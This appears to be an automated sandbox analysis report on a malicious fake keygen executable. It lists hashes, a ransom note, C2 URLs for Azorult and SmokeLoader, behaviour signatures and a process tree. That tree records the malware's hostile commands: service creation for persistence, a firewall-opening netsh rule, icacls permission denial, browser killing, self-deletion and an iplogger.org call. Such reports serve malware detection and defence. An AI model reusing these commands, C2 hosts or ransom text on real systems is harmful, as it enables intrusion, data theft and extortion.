Overview

overview

10

Static

static

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

8

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

8

ฺฺฺK...ฺฺ

windows10_x64

3

ฺฺฺK...ฺฺ

windows10_x64

3

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

1

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

8

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

1

ฺฺฺK...ฺฺ

windows10_x64

8

Resubmissions

03-07-2024 16:04

240703-thygmaycpc 10

01-07-2024 18:12

240701-ws6xvswbkj 10

01-07-2024 18:03

240701-wm5sls1gka 10

01-07-2024 18:03

240701-wm39sa1gjf 10

01-07-2024 18:03

240701-wm2e7avhkj 10

01-07-2024 18:03

240701-wmzxcs1fre 10

01-07-2024 18:02

240701-wmzats1frc 10

01-07-2024 18:02

240701-wmvbwa1fqh 10

22-11-2023 17:02

231122-vkac9adg64 10

Analysis

  • max time kernel
    530s
  • max time network
    555s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    19-11-2020 13:14

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe

  • Size

    9.5MB

  • MD5

    edcc1a529ea8d2c51592d412d23c057e

  • SHA1

    1d62d278fe69be7e3dde9ae96cc7e6a0fa960331

  • SHA256

    970645912c0c0b6eb857236e6bcbfcafcb0eaf0f19d2b278c5b180ee31bb8a5d

  • SHA512

    c8d9fc14c74c87284ed92d7879e5968129572b8fc4e921f48a14b82b98f26737f89daa87213cd9068fa53a8ef84b8e07f1ce053f06790d417ff8dc621b346cab

Score
10/10
agentteslaazorultredlinesmokeloadertofseexmrigbackdoorbootkitdiscoveryevasioninfostealerkeyloggermacrominerpersistenceransomwarespywarestealertrojanupxvmprotect

Malware Config

Extracted

Path

C:\_readme.txt

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-lYFGr2p9Fq Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0266OrjkgUGkv6TOoEMNyhW6VCgrizkAUg4XiClXtVqLCdtl
URLs

https://we.tl/t-lYFGr2p9Fq

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

smokeloader

Version

2020

C2

http://naritouzina.net/

http://nukaraguasleep.net/

http://notfortuaj.net/

http://natuturalistic.net/

http://zaniolofusa.net/

http://vintrsi.com/upload/

http://woatdert.com/upload/

http://waruse.com/upload/
rc4.i32
rc4.i32

Extracted

Family

smokeloader

Version

2019

C2

http://10022020newfolder1002002131-service1002.space/

http://10022020newfolder1002002231-service1002.space/

http://10022020newfolder3100231-service1002.space/

http://10022020newfolder1002002431-service1002.space/

http://10022020newfolder1002002531-service1002.space/

http://10022020newfolder33417-01242510022020.space/

http://10022020test125831-service1002012510022020.space/

http://10022020test136831-service1002012510022020.space/

http://10022020test147831-service1002012510022020.space/

http://10022020test146831-service1002012510022020.space/

http://10022020test134831-service1002012510022020.space/

http://10022020est213531-service100201242510022020.ru/

http://10022020yes1t3481-service1002012510022020.ru/

http://10022020test13561-service1002012510022020.su/

http://10022020test14781-service1002012510022020.info/

http://10022020test13461-service1002012510022020.net/

http://10022020test15671-service1002012510022020.tech/

http://10022020test12671-service1002012510022020.online/

http://10022020utest1341-service1002012510022020.ru/

http://10022020uest71-service100201dom2510022020.ru/
rc4.i32
rc4.i32

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

    trojaninfostealerazorult
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • AgentTesla Payload 2 IoCs
    keyloggerstealer
  • XMRig Miner Payload 2 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 48 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Modifies extensions of user files 10 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Sets service image path in registry 2 TTPs
    persistence
  • Suspicious Office macro 2 IoCs

    Office document equipped with 4.0 macros.

    macro
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • VMProtect packed file 2 IoCs

    Detects executables packed with VMProtect commercial packer.

    vmprotect
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 11 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spyware
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 5 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • JavaScript code in executable 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 166 IoCs
    persistence
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 41 IoCs
  • Drops file in Windows directory 9 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Checks SCSI registry key(s) 3 TTPs 117 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Kills process with taskkill 3 IoCs
    evasion
  • Modifies Control Panel 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 7 IoCs
  • Modifies registry class 165 IoCs
  • Modifies system certificate store 2 TTPs 12 IoCs
    evasionspywaretrojan
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4577 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 235 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 18 IoCs
  • Suspicious use of WriteProcessMemory 278 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
    1⤵
      PID:728
      • C:\Windows\TEMP\CBBEDF528F97C51A.exe
        C:\Windows\TEMP\CBBEDF528F97C51A.exe
        2⤵
        • Executes dropped EXE
        PID:1760
        • C:\Users\Admin\AppData\Local\Temp\is-RGVNP.tmp\CBBEDF528F97C51A.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-RGVNP.tmp\CBBEDF528F97C51A.tmp" /SL5="$301D6,761193,121344,C:\Windows\TEMP\CBBEDF528F97C51A.exe"
          3⤵
          • Executes dropped EXE
          • Drops file in Program Files directory
          • Suspicious use of FindShellTrayWindow
          PID:752
          • C:\Program Files (x86)\RearRips\seed.sfx.exe
            "C:\Program Files (x86)\RearRips\seed.sfx.exe" -pK2j8l614 -s1
            4⤵
            • Executes dropped EXE
            • Drops file in Program Files directory
            PID:3868
            • C:\Program Files (x86)\Seed Trade\Seed\seed.exe
              "C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks SCSI registry key(s)
              • Suspicious behavior: MapViewOfSection
              PID:756
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /c "start https://iplogger.org/14Ahe7"
            4⤵
            • Checks computer location settings
            PID:1120
    • C:\Users\Admin\AppData\Local\Temp\Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe
      "C:\Users\Admin\AppData\Local\Temp\Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:3884
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3184
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\intro.exe
          intro.exe 1O5ZF
          3⤵
          • Executes dropped EXE
          PID:3944
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
          keygen-pr.exe -p83fsase3Ge
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:3644
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1600
            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
              C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
              5⤵
                PID:3816
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
            keygen-step-1.exe
            3⤵
            • Executes dropped EXE
            PID:4084
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
            keygen-step-4.exe
            3⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2140
            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\002.exe
              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\002.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetWindowsHookEx
              PID:676
            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:2828
              • C:\Users\Admin\AppData\Local\Temp\sibC859.tmp\0\setup.exe
                "C:\Users\Admin\AppData\Local\Temp\sibC859.tmp\0\setup.exe" -s
                5⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:3356
                • C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe
                  "C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe"
                  6⤵
                  • Executes dropped EXE
                  • Checks whether UAC is enabled
                  • Writes to the Master Boot Record (MBR)
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Modifies system certificate store
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:2556
                  • C:\Windows\SysWOW64\msiexec.exe
                    msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
                    7⤵
                    • Enumerates connected drives
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    PID:4064
                  • C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe
                    C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe 0011 installp1
                    7⤵
                    • Executes dropped EXE
                    • Checks whether UAC is enabled
                    • Writes to the Master Boot Record (MBR)
                    • Suspicious use of SetThreadContext
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of SetWindowsHookEx
                    • Suspicious use of WriteProcessMemory
                    PID:3476
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe"
                      8⤵
                      • Suspicious use of SetWindowsHookEx
                      PID:3868
                    • C:\Users\Admin\AppData\Roaming\1605791999659.exe
                      "C:\Users\Admin\AppData\Roaming\1605791999659.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605791999659.txt"
                      8⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of SetWindowsHookEx
                      PID:1316
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe"
                      8⤵
                      • Suspicious use of SetWindowsHookEx
                      PID:776
                    • C:\Users\Admin\AppData\Roaming\1605792005862.exe
                      "C:\Users\Admin\AppData\Roaming\1605792005862.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605792005862.txt"
                      8⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of SetWindowsHookEx
                      PID:2184
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe"
                      8⤵
                      • Suspicious use of SetWindowsHookEx
                      PID:3548
                    • C:\Users\Admin\AppData\Roaming\1605792011175.exe
                      "C:\Users\Admin\AppData\Roaming\1605792011175.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605792011175.txt"
                      8⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of SetWindowsHookEx
                      PID:2444
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe"
                      8⤵
                      • Suspicious use of SetWindowsHookEx
                      PID:1360
                    • C:\Users\Admin\AppData\Roaming\1605792015534.exe
                      "C:\Users\Admin\AppData\Roaming\1605792015534.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605792015534.txt"
                      8⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of SetWindowsHookEx
                      PID:1332
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe"
                      8⤵
                        PID:3652
                        • C:\Windows\SysWOW64\PING.EXE
                          ping 127.0.0.1 -n 3
                          9⤵
                          • Runs ping.exe
                          PID:2540
                    • C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe
                      C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe 200 installp1
                      7⤵
                      • Executes dropped EXE
                      • Checks whether UAC is enabled
                      • Writes to the Master Boot Record (MBR)
                      • Checks SCSI registry key(s)
                      • Suspicious use of SetWindowsHookEx
                      PID:2492
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /c taskkill /f /im chrome.exe
                        8⤵
                          PID:2888
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /f /im chrome.exe
                            9⤵
                            • Kills process with taskkill
                            PID:3288
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe"
                          8⤵
                            PID:1376
                            • C:\Windows\SysWOW64\PING.EXE
                              ping 127.0.0.1 -n 3
                              9⤵
                              • Runs ping.exe
                              PID:3928
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe"
                          7⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3792
                          • C:\Windows\SysWOW64\PING.EXE
                            ping 127.0.0.1 -n 3
                            8⤵
                            • Runs ping.exe
                            PID:3260
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\jg2_2qua.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\jg2_2qua.exe"
                    4⤵
                    • Executes dropped EXE
                    • Checks whether UAC is enabled
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4004
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\hjjgaa.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\hjjgaa.exe"
                    4⤵
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • Suspicious use of WriteProcessMemory
                    PID:2392
                    • C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
                      C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt
                      5⤵
                      • Executes dropped EXE
                      PID:3968
                    • C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
                      C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt
                      5⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3648
            • C:\Windows\system32\msiexec.exe
              C:\Windows\system32\msiexec.exe /V
              1⤵
              • Enumerates connected drives
              • Modifies service
              • Drops file in Program Files directory
              • Drops file in Windows directory
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3056
              • C:\Windows\syswow64\MsiExec.exe
                C:\Windows\syswow64\MsiExec.exe -Embedding 770B590FD7E6EAA9A92FBDD7C1B745B9 C
                2⤵
                • Loads dropped DLL
                PID:2108
              • C:\Windows\system32\srtasks.exe
                C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                2⤵
                • Modifies service
                PID:3996
            • C:\Windows\system32\vssvc.exe
              C:\Windows\system32\vssvc.exe
              1⤵
              • Modifies service
              PID:204
            • \??\c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
              1⤵
              • Checks SCSI registry key(s)
              • Modifies data under HKEY_USERS
              PID:3744
            • C:\Windows\system32\compattelrunner.exe
              C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
              1⤵
                PID:1260
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                1⤵
                • Drops file in Windows directory
                • Modifies Control Panel
                • Modifies Internet Explorer settings
                • Modifies registry class
                • Suspicious use of SetWindowsHookEx
                PID:2724
              • C:\Windows\system32\browser_broker.exe
                C:\Windows\system32\browser_broker.exe -Embedding
                1⤵
                • Modifies Internet Explorer settings
                PID:1208
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                1⤵
                • Modifies registry class
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:1240
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                1⤵
                • Modifies Internet Explorer settings
                • Modifies registry class
                PID:2504
              • C:\Program Files (x86)\gdiview\gdiview\GDIView.exe
                "C:\Program Files (x86)\gdiview\gdiview\GDIView.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious behavior: GetForegroundWindowSpam
                PID:2216
              • C:\Users\Admin\AppData\Local\Temp\E31.exe
                C:\Users\Admin\AppData\Local\Temp\E31.exe
                1⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Modifies system certificate store
                PID:1460
                • C:\Windows\SysWOW64\icacls.exe
                  icacls "C:\Users\Admin\AppData\Local\5bd90af8-5288-4392-9437-008294739710" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                  2⤵
                  • Modifies file permissions
                  PID:2172
                • C:\Users\Admin\AppData\Local\Temp\E31.exe
                  "C:\Users\Admin\AppData\Local\Temp\E31.exe" --Admin IsNotAutoStart IsNotTask
                  2⤵
                  • Executes dropped EXE
                  • Modifies extensions of user files
                  • Modifies system certificate store
                  PID:1708
                  • C:\Users\Admin\AppData\Local\15aa6ea4-4c3c-4dcf-9bdf-0d95598f184f\updatewin1.exe
                    "C:\Users\Admin\AppData\Local\15aa6ea4-4c3c-4dcf-9bdf-0d95598f184f\updatewin1.exe"
                    3⤵
                    • Executes dropped EXE
                    PID:1572
                    • C:\Users\Admin\AppData\Local\15aa6ea4-4c3c-4dcf-9bdf-0d95598f184f\updatewin1.exe
                      "C:\Users\Admin\AppData\Local\15aa6ea4-4c3c-4dcf-9bdf-0d95598f184f\updatewin1.exe" --Admin
                      4⤵
                      • Executes dropped EXE
                      PID:4904
                  • C:\Users\Admin\AppData\Local\15aa6ea4-4c3c-4dcf-9bdf-0d95598f184f\updatewin2.exe
                    "C:\Users\Admin\AppData\Local\15aa6ea4-4c3c-4dcf-9bdf-0d95598f184f\updatewin2.exe"
                    3⤵
                    • Drops file in Drivers directory
                    • Executes dropped EXE
                    PID:1864
                  • C:\Users\Admin\AppData\Local\15aa6ea4-4c3c-4dcf-9bdf-0d95598f184f\5.exe
                    "C:\Users\Admin\AppData\Local\15aa6ea4-4c3c-4dcf-9bdf-0d95598f184f\5.exe"
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:2776
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & erase C:\Users\Admin\AppData\Local\15aa6ea4-4c3c-4dcf-9bdf-0d95598f184f\5.exe & exit
                      4⤵
                        PID:4608
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /im 5.exe /f
                          5⤵
                          • Kills process with taskkill
                          PID:4656
                • C:\Users\Admin\AppData\Local\Temp\F0D.exe
                  C:\Users\Admin\AppData\Local\Temp\F0D.exe
                  1⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Checks processor information in registry
                  PID:2096
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c taskkill /im F0D.exe /f & erase C:\Users\Admin\AppData\Local\Temp\F0D.exe & exit
                    2⤵
                      PID:616
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /im F0D.exe /f
                        3⤵
                        • Kills process with taskkill
                        PID:2012
                  • C:\Users\Admin\AppData\Local\Temp\125A.exe
                    C:\Users\Admin\AppData\Local\Temp\125A.exe
                    1⤵
                    • Executes dropped EXE
                    • Adds Run key to start application
                    PID:2044
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\hijmifiu\
                      2⤵
                        PID:1988
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\conbmwey.exe" C:\Windows\SysWOW64\hijmifiu\
                        2⤵
                          PID:3956
                        • C:\Windows\SysWOW64\sc.exe
                          "C:\Windows\System32\sc.exe" create hijmifiu binPath= "C:\Windows\SysWOW64\hijmifiu\conbmwey.exe /d\"C:\Users\Admin\AppData\Local\Temp\125A.exe\"" type= own start= auto DisplayName= "wifi support"
                          2⤵
                            PID:4044
                          • C:\Windows\SysWOW64\sc.exe
                            "C:\Windows\System32\sc.exe" description hijmifiu "wifi internet conection"
                            2⤵
                              PID:2984
                            • C:\Windows\SysWOW64\sc.exe
                              "C:\Windows\System32\sc.exe" start hijmifiu
                              2⤵
                                PID:2908
                              • C:\Windows\SysWOW64\netsh.exe
                                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                2⤵
                                  PID:1312
                                • C:\Users\Admin\uthjxuvn.exe
                                  "C:\Users\Admin\uthjxuvn.exe" /d"C:\Users\Admin\AppData\Local\Temp\125A.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:3684
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\uuvgbcai.exe" C:\Windows\SysWOW64\hijmifiu\
                                    3⤵
                                      PID:4996
                                    • C:\Windows\SysWOW64\sc.exe
                                      "C:\Windows\System32\sc.exe" config hijmifiu binPath= "C:\Windows\SysWOW64\hijmifiu\uuvgbcai.exe /d\"C:\Users\Admin\uthjxuvn.exe\""
                                      3⤵
                                        PID:5084
                                      • C:\Windows\SysWOW64\sc.exe
                                        "C:\Windows\System32\sc.exe" start hijmifiu
                                        3⤵
                                          PID:4336
                                        • C:\Windows\SysWOW64\netsh.exe
                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                          3⤵
                                            PID:4264
                                      • C:\Users\Admin\AppData\Local\Temp\16C0.exe
                                        C:\Users\Admin\AppData\Local\Temp\16C0.exe
                                        1⤵
                                        • Executes dropped EXE
                                        PID:3408
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\Temp\16C0.exe
                                          2⤵
                                            PID:976
                                            • C:\Windows\SysWOW64\timeout.exe
                                              timeout /t 3
                                              3⤵
                                              • Delays execution with timeout.exe
                                              PID:3232
                                        • C:\Users\Admin\AppData\Local\Temp\2DC3.exe
                                          C:\Users\Admin\AppData\Local\Temp\2DC3.exe
                                          1⤵
                                          • Executes dropped EXE
                                          PID:400
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "cmd.exe" /C ping 127.0.0.1 -n 3 > nul & del ""
                                            2⤵
                                              PID:4800
                                              • C:\Windows\SysWOW64\PING.EXE
                                                ping 127.0.0.1 -n 3
                                                3⤵
                                                • Runs ping.exe
                                                PID:4840
                                          • C:\Users\Admin\AppData\Local\Temp\38A2.exe
                                            C:\Users\Admin\AppData\Local\Temp\38A2.exe
                                            1⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Checks SCSI registry key(s)
                                            • Suspicious behavior: MapViewOfSection
                                            PID:1432
                                          • C:\Users\Admin\AppData\Local\Temp\48FE.exe
                                            C:\Users\Admin\AppData\Local\Temp\48FE.exe
                                            1⤵
                                            • Executes dropped EXE
                                            • Checks whether UAC is enabled
                                            PID:2052
                                          • C:\Users\Admin\AppData\Local\Temp\5553.exe
                                            C:\Users\Admin\AppData\Local\Temp\5553.exe
                                            1⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:1532
                                            • C:\Users\Admin\AppData\Local\Temp\5553.exe
                                              C:\Users\Admin\AppData\Local\Temp\5553.exe
                                              2⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Checks SCSI registry key(s)
                                              • Suspicious behavior: MapViewOfSection
                                              PID:4520
                                          • C:\Users\Admin\AppData\Local\Temp\806C.exe
                                            C:\Users\Admin\AppData\Local\Temp\806C.exe
                                            1⤵
                                            • Executes dropped EXE
                                            PID:432
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
